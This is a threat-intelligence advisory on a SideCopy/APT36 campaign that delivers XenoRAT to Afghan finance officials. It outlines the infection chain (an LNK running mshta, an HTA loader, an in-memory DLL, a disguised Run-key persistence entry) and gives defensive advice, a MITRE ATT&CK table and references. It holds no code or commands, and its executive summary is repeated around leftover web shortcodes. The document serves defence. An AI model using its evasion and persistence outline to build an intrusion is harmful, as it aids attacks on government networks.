EXECUTIVE SUMMARY
The campaign, attributed to the SideCopy group operating under the Transparent Tribe/APT36 umbrella, targets Afghanistan's Ministry of Finance and its provincial revenue directorates. The actors employ a spear‐phishing attachment that disguises a malicious shortcut as a PDF‐named document in Pashto, reflecting deep knowledge of local language and workflow. Their primary objective is the covert collection of financial records, personnel details, and communications that can be leveraged for intelligence or future extortion. By focusing on a government finance network, the operation seeks to compromise a critical pillar of the country's economic administration. The infection chain begins with a ZIP archive delivered to targeted officials.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The campaign, attributed to the SideCopy group operating under the Transparent Tribe/APT36 umbrella, targets Afghanistan's Ministry of Finance and its provincial revenue directorates. The actors employ a spear‐phishing attachment that disguises a malicious shortcut as a PDF‐named document in Pashto, reflecting deep knowledge of local language and workflow. Their primary objective is the covert collection of financial records, personnel details, and communications that can be leveraged for intelligence or future extortion. By focusing on a government finance network, the operation seeks to compromise a critical pillar of the country's economic administration. The infection chain begins with a ZIP archive delivered to targeted officials.[emaillocker id="1283"]
Inside, a shortcut file triggers mshta.exe, which fetches an HTA payload from a compromised Afghan education domain. The HTA runs obfuscated JavaScript that reconstructs a loader DLL entirely in memory, avoiding disk writes. That loader establishes a Registry Run key disguised as a legitimate Edge entry, ensuring persistence across reboots. Finally, the loader drops XenoRAT, which beacons to a bullet‐proof European server, enabling command‐and‐control, lateral movement, and exfiltration of harvested finance data. The entire sequence relies on legitimate Windows binaries to evade traditional detection.
The threat poses a serious risk to any organization that handles sensitive financial information because the malware operates largely fileless and blends its traffic with legitimate government services. Its use of native utilities, encrypted beaconing, and a stealthy persistence mechanism makes detection difficult and recovery time‐consuming. Defenders should harden email gateways, enforce attachment scanning, and block execution of mshta.exe from untrusted sources. Regular audits of registry Run entries, network monitoring for anomalous outbound connections, and a robust backup strategy provide multiple layers of protection. Deploying endpoint detection with behavioral analytics further reduces the chance of successful compromise.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | — |
| Privilege Escalation | T1055 | Process Injection | — |
| Defense Evasion | T1564.001 | Hide Artifacts | Hidden Files and Directories |
| Discovery | T1012 | Query Registry | — |
| Discovery | T1082 | System Information Discovery | — |
| Discovery | T1518.001 | Software Discovery | Security Software Discovery |
| Collection | T1113 | Screen Capture | — |
REFERENCES:
The reports contain further technical details:
https://www.seqrite.com/blog/operation-xenofiscal-sidecopy-deploying-persistent-xenorat-targeting-the-mof-afghanistan/
https://therecord.media/afghan-officials-targeted-by-sidecopy